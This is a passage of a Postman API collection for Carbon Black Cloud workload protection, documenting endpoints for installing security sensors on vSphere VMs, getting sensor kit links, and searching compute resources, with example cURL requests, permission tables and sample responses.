Black Cloud (CBC)","type":"folder"}}},{"name":"Sensor Lifecycle Management","item":[{"name":"Request Workload Sensor Installation","id":"e41bc2a0-74df-41a6-b587-6eca1dfb7740","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"formdata","formdata":[{"key":"action_type","value":"INSTALL","description":"<p>The action to perform on the specified workloads</p>\n","type":"text"},{"key":"install_request","description":"<p>A JSON file of the compute resources to install Carbon Black Cloud sensors and the sensor version to install</p>\n","type":"file","value":null},{"key":"file","description":"<p>[optional] A Config.ini file with a list of sensor properties to configure on installation</p>\n","type":"file","value":null}]},"url":"{{cb_url}}/lcm/v1/orgs/{{cb_org_key}}/workloads/actions","description":"<p>Starts the install process of Carbon Black Cloud sensors on VMs</p>\n<p><strong>Note:</strong> Postman does not create the correct cURL request for this endpoint. Use this as an example cURL request:</p>\n<blockquote>\n<p><code>curl -v 'https://defense.conferdeploy.net/lcm/v1/orgs/{{cb_org_key}}/workloads/actions' --header 'x-auth-token: ' -F 'action_type=INSTALL' -F 'install_request=@&lt;filepath/filename.json&gt;;type=application/json'</code></p>\n</blockquote>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.vcenter.vm_sensor_install</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/sensor-lifecycle-management/#request-workload-sensor-installation\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","v1","orgs","{{cb_org_key}}","workloads","actions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"e41bc2a0-74df-41a6-b587-6eca1dfb7740"},{"name":"Get Sensor Kit and Configuration Links","id":"4aca033d-9496-406b-a83d-05a50ac810bd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"formdata","formdata":[{"key":"sensor_url_request","description":"<p>A JSON file of the Carbon Black Cloud sensors with version and the expiration time</p>\n","type":"file","value":null},{"key":"configParams","description":"<p>A Config.ini file with a list of sensor properties to configure on installation</p>\n","type":"file","value":null}]},"url":"{{cb_url}}/lcm/v1/orgs/{{cb_org_key}}/sensor/_download","description":"<p>Generates a sensor and config download link</p>\n<p><strong>Note:</strong> Postman does not create the correct cURL request for this endpoint. Use this as an example cURL request:</p>\n<blockquote>\n<p><code>curl -v 'https://defense.conferdeploy.net/lcm/v1/orgs/{{cb_org_key}}/sensor/_download' --header 'x-auth-token: ' -F 'sensor_url_request=@&lt;filepath/filename.json&gt;;type=application/json'</code></p>\n</blockquote>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.kits</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/sensor-lifecycle-management/#get-sensor-kit-and-configuration-links\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","v1","orgs","{{cb_org_key}}","sensor","_download"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"4aca033d-9496-406b-a83d-05a50ac810bd"},{"name":"Get Sensor Configuration Template","id":"80f220ad-2be5-4528-af06-1538d7942171","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/lcm/v1/orgs/{{cb_org_key}}/sensor/config_template","description":"<p>Gets a sample <code>config.ini</code> file with the required properties populated</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.kits</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/sensor-lifecycle-management/#get-sensor-configuration-template\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","v1","orgs","{{cb_org_key}}","sensor","config_template"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"80f220ad-2be5-4528-af06-1538d7942171"}],"id":"86c5a4a5-3783-43b9-802f-801d91a7b2f4","description":"<h2 id=\"overview\">Overview</h2>\n<p>This API lets you install Carbon Black Cloud sensors onto vSphere-based cloud workloads and get sensor kit and config file URL for integration with WorkspaceONE. You can asynchronously install Carbon Black Cloud sensors onto vSphere-based workloads, and you can stagger installation to reduce performance impact on vSphere and the client network.</p>\n<h3 id=\"use-cases\">Use Cases</h3>\n<ul>\n<li>Life cycle management from cloud</li>\n<li>This API allows users to asynchronously install Carbon Black Cloud sensors on vSphere based workloads</li>\n<li>Allows staggering of installation to reduce load on vSphere and client network</li>\n</ul>\n<h3 id=\"requirements\">Requirements</h3>\n<ul>\n<li>Appliance and vSphere configured to communicate with the Carbon Black Cloud see <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/installation\">Installation Guide</a> for more information</li>\n<li>Carbon Black Cloud Workload - You must have purchased one of the Carbon Black Cloud Workload packages</li>\n<li>All API calls require an API key with appropriate permissions see <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/sensor-lifecycle-management/#authentication\">Authentication</a></li>\n</ul>\n<h2 id=\"quick-start-instructions\">Quick Start Instructions</h2>\n<h3 id=\"multipartform-data-api-requests\">Multipart/Form-Data API Requests</h3>\n<p>This API includes two API routes, <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/sensor-lifecycle-management/#request-workload-sensor-installation\">Request Workload Sensor Installation</a> and <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/sensor-lifecycle-management/#get-sensor-kit-and-configuration-links\">Get Sensor Kit and Configuration Links</a>, that use multipart/form-data in order to make a request. Multipart/form-data utilizes blocks of data to send each component of the request with a variable name assigned to each block. The blocks of data are expected as text or binary data.</p>\n<p>The following examples show how to make a multipart/form-data using either cURL or Postman.</p>\n<h4 id=\"curl\">cURL</h4>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>curl --location --request POST 'https://defense-eap01.conferdeploy.net/lcm/v1/orgs/ABCD1234/workloads/actions' \\\n    --header 'X-auth-token: API_SECRET_KEY/API_ID' \\\n    --form 'action_type=INSTALL' \\\n    --form 'install_request=@/Users/john.doe/Desktop/install_request.json' \\\n    --form 'file=@/Users/john.doe/Desktop/Config.ini'\n</code></pre>","_postman_id":"86c5a4a5-3783-43b9-802f-801d91a7b2f4","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"VM Workloads Search API","item":[{"name":"Deprecated - v1","item":[{"name":"Fetch Compute Resource by ID","id":"40e827fe-7e1f-44eb-b238-f61300f32c31","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/lcm/view/v1/orgs/{{cb_org_key}}/compute_resources/{{cb_wl_resource_id}}","description":"<p>Get the compute resource by ID from your organization</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.vcenter.vm</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/deprecated/vm-workload-search#fetch-compute-resource-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","view","v1","orgs","{{cb_org_key}}","compute_resources","{{cb_wl_resource_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"40e827fe-7e1f-44eb-b238-f61300f32c31"},{"name":"Search and Facet Compute Resources","id":"81015d18-0e98-47e7-a5e0-4151e27aacfe","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"start\": \"<long>\",\n  \"rows\": \"<long>\",\n  \"sort\": [\n    {\n      \"field\": \"<string>\",\n      \"order\": \"<string>\"\n    }\n  ],\n  \"query\": \"<string>\",\n  \"criteria\": {\n    \"type\": [ \"<string>\" ],\n    \"appliance_uuid\": [ \"<string>\" ],\n    \"cluster_name\": [ \"<string>\" ],\n    \"datacenter_name\": [ \"<string>\" ],\n    \"esx_host_name\": [ \"<string>\" ],\n    \"esx_host_uuid\": [ \"<string>\" ],\n    \"vcenter_name\": [ \"<string>\" ],\n    \"vcenter_host_url\": [ \"<string>\" ],\n    \"vcenter_uuid\": [ \"<string>\" ],\n    \"name\": [ \"<string>\" ],\n    \"host_name\": [ \"<string>\" ],\n    \"ip_address\": [ \"<string>\" ],\n    \"device_guid\": [ \"<string>\" ],\n    \"registration_id\": [ \"<string>\" ],\n    \"eligibility\": [ \"<string>\" ],\n    \"eligibility_code\": [ \"<string>\" ],\n    \"installation_status\": [ \"<string>\" ],\n    \"installation_type\": [ \"<string>\" ],\n    \"uuid\": [ \"<string>\" ],\n    \"os_description\": [ \"<string>\" ],\n    \"os_type\": [ \"<string>\" ],\n    \"os_architecture\": [ \"<string>\" ],\n    \"vmwaretools_version\": [ \"<string>\" ]\n  },\n  \"terms\": {\n    \"rows\": \"<long>\",\n    \"fields\": [\n      \"<string>\"\n    ]\n  }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v1/orgs/{{cb_org_key}}/compute_resources/_search","description":"<p>Search and facet compute resources in your organization</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.vcenter.vm</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/deprecated/vm-workload-search#search-and-facet-compute-resources\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","view","v1","orgs","{{cb_org_key}}","compute_resources","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"81015d18-0e98-47e7-a5e0-4151e27aacfe"}],"id":"b7e0dbaa-b9d7-479e-84ff-fc12b41264ab","description":"<h2 id=\"overview\">Overview</h2>\n<p>This API lets Carbon Black Cloud Workload users visualize the inventory of vSphere workloads that do not have Carbon Black Cloud sensors installed.</p>\n<h3 id=\"use-cases\">Use Cases</h3>\n<ul>\n<li>Life cycle management from cloud</li>\n<li>Provides search and facet results in a single call to reduce inconsistency</li>\n</ul>\n<h3 id=\"requirements\">Requirements</h3>\n<ul>\n<li>Appliance and vSphere configured to communicate with the Carbon Black Cloud see <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/installation\">Installation Guide</a> for more information</li>\n<li>Carbon Black Cloud Workload - You must have purchased one of the Carbon Black Cloud Workload packages</li>\n<li>All API calls require an API key with appropriate permissions see <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vm-workload-search/#authentication\">Authentication</a></li>\n</ul>\n","_postman_id":"b7e0dbaa-b9d7-479e-84ff-fc12b41264ab","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Check Compute Resource Eligibility","id":"b56d46e7-3ef9-4713-9c86-47a63af15854","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"guest_info_disabled\": false,\n    \"guest_id\": \"centos8_64Guest\",\n    \"guest_full_name\": \"Centos 8\",\n    \"tools_version_status\": \"GUEST_TOOLS_CURRENT\",\n    \"cb_launcher_version\": \"1\",\n    \"cb_os_id\": \"Centos8\",\n    \"cb_os_version\": \"8\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_eligibility","description":"<h3 id=\"check-compute-resource-eligibility\">Check Compute Resource Eligibility</h3>\n<p>Submit the compute resource’s metadata to confirm eligibility for Carbon Black Cloud sensor installation.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.vcenter.vm</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"guest_info_disabled\": &lt;boolean&gt;,\n  \"guest_id\": \"&lt;string&gt;\",\n  \"guest_full_name\": \"&lt;string&gt;\",\n  \"tools_version_status\": \"&lt;string&gt;\",\n  \"cb_launcher_version\": \"&lt;string&gt;\",\n  \"cb_os_id\": \"&lt;string&gt;\",\n  \"cb_os_version\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vm-workload-search#check-compute-resource-eligibility\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","view","v2","orgs","{{cb_org_key}}","compute_eligibility"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"b6c985f7-0ec4-4bd7-b233-c82e59f6836c","name":"Check Compute Resource Eligibility","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"guest_info_disabled\": false,\n    \"guest_id\": \"centos8_64Guest\",\n    \"guest_full_name\": \"Centos 8\",\n    \"tools_version_status\": \"GUEST_TOOLS_CURRENT\",\n    \"cb_launcher_version\": \"1\",\n    \"cb_os_id\": \"Centos8\",\n    \"cb_os_version\": \"8\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_eligibility"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:25:33 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"52"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Tracer-Id","value":"52eca7020197a193834b931c60c9034e"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"eligibility\": \"ELIGIBLE\",\n    \"eligibility_code\": null\n}"}],"_postman_id":"b56d46e7-3ef9-4713-9c86-47a63af15854"},{"name":"Search Workload Compute Resources","id":"fc0ec0da-7b5e-4b3c-a4ec-f97061563d87","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"start\": 0,\n    \"rows\": 1,\n    \"criteria\": {\n        \"deployment_type\": [\n            \"WORKLOAD\"\n        ],\n        \"installation_status\": [\n            \"NOT_INSTALLED\",\n            \"PENDING\",\n            \"ERROR\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"created_at\",\n            \"order\": \"DESC\"\n        },\n        {\n            \"field\": \"eligibility\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/_search","description":"<h3 id=\"search-workload-compute-resources\">Search Workload Compute Resources</h3>\n<p>Search Workload compute resources in your organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.vcenter.vm</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"start\": &lt;integer&gt;,\n  \"rows\": &lt;integer&gt;,\n  \"query\": \"&lt;string&gt;\",\n  \"criteria\": {\n    \"appliance_uuid\": [ \"&lt;string&gt;\" ],\n    \"cluster_name\": [ \"&lt;string&gt;\" ],\n    \"datacenter_name\": [ \"&lt;string&gt;\" ],\n    \"deployment_type\": [ \"&lt;string&gt;\" ],\n    \"esx_host_name\": [ \"&lt;string&gt;\" ],\n    \"esx_host_uuid\": [ \"&lt;string&gt;\" ],\n    \"vcenter_name\": [ \"&lt;string&gt;\" ],\n    \"vcenter_host_url\": [ \"&lt;string&gt;\" ],\n    \"vcenter_uuid\": [ \"&lt;string&gt;\" ],\n    \"name\": [ \"&lt;string&gt;\" ],\n    \"host_name\": [ \"&lt;string&gt;\" ],\n    \"ip_address\": [ \"&lt;string&gt;\" ],\n    \"device_guid\": [ \"&lt;string&gt;\" ],\n    \"registration_id\": [ \"&lt;string&gt;\" ],\n    \"eligibility\": [ \"&lt;string&gt;\" ],\n    \"eligibility_code\": [ \"&lt;string&gt;\" ],\n    \"installation_status\": [ \"&lt;string&gt;\" ],\n    \"installation_type\": [ \"&lt;string&gt;\" ],\n    \"uuid\": [ \"&lt;string&gt;\" ],\n    \"os_description\": [ \"&lt;string&gt;\" ],\n    \"os_type\": [ \"&lt;string&gt;\" ],\n    \"os_architecture\": [ \"&lt;string&gt;\" ],\n    \"vmwaretools_version\": [ \"&lt;string&gt;\" ]\n  },\n  \"exclusions\": {\n    \"appliance_uuid\": [ \"&lt;string&gt;\" ],\n    \"cluster_name\": [ \"&lt;string&gt;\" ],\n    \"datacenter_name\": [ \"&lt;string&gt;\" ],\n    \"deployment_type\": [ \"&lt;string&gt;\" ],\n    \"esx_host_name\": [ \"&lt;string&gt;\" ],\n    \"esx_host_uuid\": [ \"&lt;string&gt;\" ],\n    \"vcenter_name\": [ \"&lt;string&gt;\" ],\n    \"vcenter_host_url\": [ \"&lt;string&gt;\" ],\n    \"vcenter_uuid\": [ \"&lt;string&gt;\" ],\n    \"name\": [ \"&lt;string&gt;\" ],\n    \"host_name\": [ \"&lt;string&gt;\" ],\n    \"ip_address\": [ \"&lt;string&gt;\" ],\n    \"device_guid\": [ \"&lt;string&gt;\" ],\n    \"registration_id\": [ \"&lt;string&gt;\" ],\n    \"eligibility\": [ \"&lt;string&gt;\" ],\n    \"eligibility_code\": [ \"&lt;string&gt;\" ],\n    \"installation_status\": [ \"&lt;string&gt;\" ],\n    \"installation_type\": [ \"&lt;string&gt;\" ],\n    \"uuid\": [ \"&lt;string&gt;\" ],\n    \"os_description\": [ \"&lt;string&gt;\" ],\n    \"os_type\": [ \"&lt;string&gt;\" ],\n    \"os_architecture\": [ \"&lt;string&gt;\" ],\n    \"vmwaretools_version\": [ \"&lt;string&gt;\" ]\n  },\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vm-workload-search#search-workload-compute-resources\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","view","v2","orgs","{{cb_org_key}}","compute_resources","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"2df17454-d396-46df-a7a7-53804e0bef84","name":"Search Workload Compute Resources","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"start\": 0,\n    \"rows\": 1,\n    \"criteria\": {\n        \"deployment_type\": [\n            \"WORKLOAD\"\n        ],\n        \"installation_status\": [\n            \"NOT_INSTALLED\",\n            \"PENDING\",\n            \"ERROR\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"created_at\",\n            \"order\": \"DESC\"\n        },\n        {\n            \"field\": \"eligibility\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:26:14 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"575"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Tracer-Id","value":"d2489647ebdbc06d7fa53830984148b1"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 278,\n    \"results\": [\n        {\n            \"deployment_type\": \"WORKLOAD\",\n            \"id\": \"111111\",\n            \"name\": \"enwin2016ards\",\n            \"org_key\": \"ABCD1234\",\n            \"create_time\": \"2023-06-13T10:46:03.742Z\",\n            \"appliance_uuid\": \"2f91a74c-240a-4455-9b66-27064944e11\",\n            \"cluster_name\": \"cls\",\n            \"datacenter_name\": \"DC\",\n            \"esx_host_name\": \"1.1.1.1\",\n            \"esx_host_uuid\": \"42012506-fe63-1d3c-6b00-c55a11bdc97b\",\n            \"vcenter_name\": \"VMware vCenter Server 7.0.1 build-16858589\",\n            \"vcenter_host_url\": \"sc2-10-186-31-103.eng.vmware.com\",\n            \"vcenter_uuid\": \"d91bff81-01ff-4e27-930f-663654839869\",\n            \"host_name\": \"enwin2016ards.enauto.com\",\n            \"created_at\": \"2023-06-13T10:46:03.742Z\",\n            \"ip_address\": \"10.186.26.198\",\n            \"eligibility\": \"NOT_ELIGIBLE\",\n            \"eligibility_code\": [\n                \"VMware Tools update required\"\n            ],\n            \"installation_status\": \"NOT_INSTALLED\",\n            \"installation_status_code\": null,\n            \"uuid\": \"503ae427-7d9b-0ab0-ebdd-cea50fb53fc4\",\n            \"os_description\": \"Microsoft Windows Server 2016 or later (64-bit)\",\n            \"os_type\": \"WINDOWS\",\n            \"os_architecture\": \"64\",\n            \"vmwaretools_version\": \"10341\"\n        }\n    ]\n}"}],"_postman_id":"fc0ec0da-7b5e-4b3c-a4ec-f97061563d87"},{"name":"Search AWS Compute Resources","id":"a81bffab-4be7-4896-8efe-131529fcc3ef","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"start\": 0,\n    \"rows\": 1,\n    \"criteria\": {\n        \"deployment_type\": [\n            \"AWS\"\n        ],\n        \"auto_scaling_group_name\": [\n            \"AutoScalingGroup\"\n        ],\n        \"availability_zone\": [\n            \"us-west-1c\"\n        ],\n        \"cloud_provider_account_id\": [\n            \"1234567890\"\n        ],\n        \"virtual_private_cloud_id\": [\n            \"vpc-id\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"name\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/_search","description":"<h3 id=\"search-aws-compute-resources\">Search AWS Compute Resources</h3>\n<p>Search AWS compute resources in your organization.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.inventory</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"start\": &lt;integer&gt;,\n  \"rows\": &lt;integer&gt;,\n  \"query\": \"&lt;string&gt;\",\n  \"criteria\": {\n    \"deployment_type\": [\"&lt;string&gt;\"],\n    \"auto_scaling_group_name\": [\"&lt;string&gt;\"],\n    \"availability_zone\": [\"&lt;string&gt;\"],\n    \"cloud_provider_account_id\": [\"&lt;string&gt;\"],\n    \"cloud_provider_resource_id\": [\"&lt;string&gt;\"],\n    \"cloud_provider_tags\": [\"&lt;string&gt;\"],\n    \"id\": [\"&lt;string&gt;\"],\n    \"installation_status\": [\"&lt;string&gt;\"],\n    \"name\": [\"&lt;string&gt;\"],\n    \"platform\": [\"&lt;string&gt;\"],\n    \"platform_details\": [\"&lt;string&gt;\"],\n    \"region\": [\"&lt;string&gt;\"],\n    \"subnet_id\": [\"&lt;string&gt;\"],\n    \"virtual_private_cloud_id\": [\"&lt;string&gt;\"],\n  },\n  \"exclusions\": {\n    \"deployment_type\": [\"&lt;string&gt;\"],\n    \"auto_scaling_group_name\": [\"&lt;string&gt;\"],\n    \"availability_zone\": [\"&lt;string&gt;\"],\n    \"cloud_provider_account_id\": [\"&lt;string&gt;\"],\n    \"cloud_provider_resource_id\": [\"&lt;string&gt;\"],\n    \"cloud_provider_tags\": [\"&lt;string&gt;\"],\n    \"id\": [\"&lt;string&gt;\"],\n    \"installation_status\": [\"&lt;string&gt;\"],\n    \"name\": [\"&lt;string&gt;\"],\n    \"platform\": [\"&lt;string&gt;\"],\n    \"platform_details\": [\"&lt;string&gt;\"],\n    \"region\": [\"&lt;string&gt;\"],\n    \"subnet_id\": [\"&lt;string&gt;\"],\n    \"virtual_private_cloud_id\": [\"&lt;string&gt;\"],\n  },\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vm-workload-search#search-aws-compute-resources\">See 